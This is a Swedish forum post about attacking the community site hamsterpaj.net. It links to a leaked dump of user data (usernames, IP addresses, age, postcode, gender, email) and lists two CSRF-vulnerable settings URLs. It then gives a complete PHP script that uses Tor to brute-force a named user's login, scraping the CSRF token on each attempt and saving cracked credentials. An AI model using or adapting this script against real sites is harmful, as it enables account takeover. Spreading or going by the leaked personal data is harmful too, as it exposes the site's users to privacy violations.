Citat:
Ursprungligen postat av
Hanna94
Kan väl vara spännande antar jag, är det bara emails eller är det användarnamn och lösenord också?
Hur många användare har sidan nu för tiden? Trodde den gått samma öde tillmötes som Lunarstorm.
Mja dom har UID som går över en miljon men tror inte dom har så många användare. Det verkar vara rätt så aktivt dock.
Finns tyvärr inga lösenord.
username,reg_ip, last_ip, reg, age, postnumber, gender, aliases, epost
https://anonfiles.com/file/ca0883376...1d40366d68e603
Finns även CSRF sårbarheter på
http://www.hamsterpaj.net/installningar/flagga/125 < för att sätta en flagga för ditt konto
http://www.hamsterpaj.net/installnin...tum/0001-11-12 < sätta ett födelsedatum
Gjorde även en liten trevlig brute forcer i PHP
Kod:
<?php
$username = $argv[1];
echo "Brute Forcing: $username\n";
$identifer = "cookie_" . rand(1, 1000) . ".txt";
$load = explode("\n", file_get_contents("passwords.txt"));
foreach($load as $password) {
$csrf = "";
$password = rtrim($password, "\r");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"http://www.hamsterpaj.net");
curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:9050/");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt( $ch, CURLOPT_COOKIESESSION, true );
curl_setopt( $ch, CURLOPT_COOKIEJAR, $identifer );
curl_setopt( $ch, CURLOPT_COOKIEFILE, $identifer );
$result = curl_exec ($ch);
$doc = new DOMDocument;
@$doc->loadhtml($result);
$xpath = new DOMXpath($doc);
foreach($xpath->query('//form[@action="/logga_in"]//input[@name="csrf_token"]') as $eInput) {
$csrf = $eInput->getAttribute('value');
}
if(empty($csrf)) {
echo "Can't get the CSRF Key!!\n";
if(strpos($result, "blivit blockerad")!==false) {
echo "We've gotten IP blocked.\n";
die();
}
file_put_contents("debug.html", $result);
} else {
curl_setopt($ch, CURLOPT_URL,"http://www.hamsterpaj.net/logga_in");
curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:9050/");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, $identifer );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt(
$ch,
CURLOPT_POSTFIELDS,
array(
'csrf_token' => $csrf,
'username' => $username,
'password' => $password,
'login_position' => 'ui_header',
'referer' => '/'
));
$login = curl_exec ($ch);
curl_setopt($ch, CURLOPT_URL,"http://www.hamsterpaj.net");
curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:9050/");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt( $ch, CURLOPT_COOKIEFILE, $identifer );
$new = curl_exec ($ch);
if(strpos($new, "/logga_ut")!==false) {
echo "]+} Successfully hacked $username:$password\n";
file_put_contents("hacked.txt", "$username:$password\n");
break;
} else {
echo "[-] FAIL: '$password'\n";
}
curl_close($ch);
}
}
?>